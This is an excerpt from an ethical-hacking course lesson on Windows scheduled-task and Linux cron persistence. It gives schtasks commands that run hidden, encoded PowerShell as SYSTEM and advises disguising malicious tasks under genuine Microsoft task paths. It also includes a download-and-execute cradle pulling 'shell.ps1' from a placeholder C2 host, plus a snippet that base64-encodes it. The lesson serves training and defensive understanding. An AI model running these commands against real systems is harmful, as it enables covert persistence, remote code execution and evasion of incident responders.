📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.
🔐 ETHICAL HACKING COURSEFREE
Part of the Ethical Hacking Mastery Course — 100 Days
Day 39 of 100 · 39% complete
⚠️ Authorised Environments Only. Scheduled tasks, cron jobs persistence techniques demonstrated here must only be practised in your own lab — DVWA, TryHackMe, or HackTheBox machines. Creating persistence on systems you don’t own or have explicit written authorisation to test is a criminal offence.
The blue team found the scheduled task. They deleted it, declared the system clean, and closed the incident. Six hours later the attacker was back — because the task they found was the decoy. The real persistence was a second task registered under the name of a legitimate Windows maintenance process, running a single obfuscated PowerShell line every night at 3AM. Scheduled task persistence is the technique I encounter most often on incident response engagements where the initial cleanup failed. Here’s how it works on both Windows and Linux — and how defenders actually detect it.
🎯 What You’ll Master in Day 39
Create and conceal scheduled task persistence on Windows via schtasks
Create cron-based persistence on Linux with multiple trigger options
Understand naming conventions and trigger patterns that evade automated detection
Enumerate and detect malicious scheduled tasks as a blue teamer
Document scheduled task persistence findings in a red team report
⏱️ 40 min read · 3 exercises · Day 39 of 100 #### ✅ Before You Start - Day 38 — Registry Persistence — run keys and COM hijacking established persistence through the Windows registry. Scheduled tasks are the second persistence tier: they survive account password changes, don’t require registry write access in all cases, and are easier to make trigger-based. - Lab: Kali Linux + either a Windows VM or TryHackMe “Windows Persistence” room · Linux target (DVWA VM or any Metasploitable) ### 📋 Day 39 — Scheduled Tasks Cron Jobs Persistence 1. Windows — schtasks Persistence 2. Windows — Naming and Trigger Evasion 3. Linux — Cron and at Persistence 4. Detection — What Blue Teams Look For Scheduled task persistence follows directly from Day 38’s registry persistence. Together they form the core persistence toolkit covered in the Ethical Hacking course. The Kali Linux Commands reference has the full schtasks and crontab syntax for lab work.
Windows — schtasks Persistence
schtasks is the command-line interface to the Windows Task Scheduler. On an engagement, schtasks requires either administrative privileges or, in misconfigured environments, standard user access — I always check both. The key is creating a task that runs your payload reliably and blends with legitimate scheduled activity.
WINDOWS SCHTASKS PERSISTENCECopy
Basic scheduled task — runs on logon
schtasks /create /tn “SystemUpdateHelper” /tr “powershell.exe -WindowStyle Hidden -EncodedCommand [BASE64]” /sc ONLOGON /ru SYSTEM
Daily at 3AM — less noisy than ONLOGON
schtasks /create /tn “\Microsoft\Windows\Maintenance\WinSAT” /tr “C:\Windows\System32\cmd.exe /c [payload]” /sc DAILY /st 03:00 /ru SYSTEM /f
Trigger on system start (survives logoffs, requires SYSTEM)
schtasks /create /tn “WindowsDefenderUpdate” /tr “powershell.exe -nop -w hidden -c [payload]” /sc ONSTART /ru SYSTEM /rl HIGHEST /f
Verify task was created
schtasks /query /tn “SystemUpdateHelper” /fo LIST
Run task immediately to test
schtasks /run /tn “SystemUpdateHelper”
List all tasks for enumeration
schtasks /query /fo CSV /nh | findstr /v “\Microsoft\Windows”
securityelites.com
schtasks Persistence — Evasive Task Created
C:> schtasks /create /tn “\Microsoft\Windows\Maintenance\WinSAT” /tr “powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgA…” /sc DAILY /st 03:00 /ru SYSTEM /f
SUCCESS: The scheduled task “\Microsoft\Windows\Maintenance\WinSAT” has successfully been created.
C:> schtasks /query /tn “\Microsoft\Windows\Maintenance\WinSAT” /fo LIST
TaskName: \Microsoft\Windows\Maintenance\WinSAT
Status: Ready
Run As: SYSTEM
→ Task uses real Windows path \Microsoft\Windows\Maintenance\ — blends with legitimate WinSAT tasks
📸 Scheduled task created under \Microsoft\Windows\Maintenance\WinSAT — a real Windows path that hosts legitimate SAT (System Assessment Tool) tasks. The malicious task uses the same folder structure and a similar task name, running SYSTEM-privileged PowerShell daily at 3AM with an encoded command payload. Automated detection that only flags unknown task folders will miss this entirely. Detection requires comparing the task’s command against a known-good baseline.
Windows — Naming and Trigger Evasion
The naming strategy I use for scheduled task persistence on red team engagements follows one principle: use the existing Windows task namespace. Every legitimate Windows task has a specific path — place your task in the same path with a plausible name and automated detection that works by path-exclusion will skip it entirely.
EVASIVE NAMING STRATEGYCopy
Legitimate Windows task paths (use these folders)
\Microsoft\Windows\Maintenance\ → WinSAT runs here
\Microsoft\Windows\Application Experience\ → ProgramDataUpdater
\Microsoft\Windows\Defrag\ → ScheduledDefrag
\Microsoft\Windows\WindowsUpdate\ → Automatic Update tasks
\Microsoft\Windows\Power Efficiency Diagnostics\ → AnalyzeSystem
Trigger selection for evasion
ONLOGON: noisy — security tools flag new ONLOGON tasks immediately
ONSTART: better — runs before most security tools initialise
DAILY + 3AM: best evasion — low activity window, normal maintenance slot
EVENT + System/EventID: advanced — triggers on specific event log entries
Payload obfuscation — encoded PowerShell
$payload = ‘IEX(New-Object Net.WebClient).DownloadString(“http://C2/shell.ps1”)’
$bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
$encoded = [Convert]::ToBase64String($bytes)
Write-Output “powershell.exe -EncodedCommand $encoded”
📖 Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)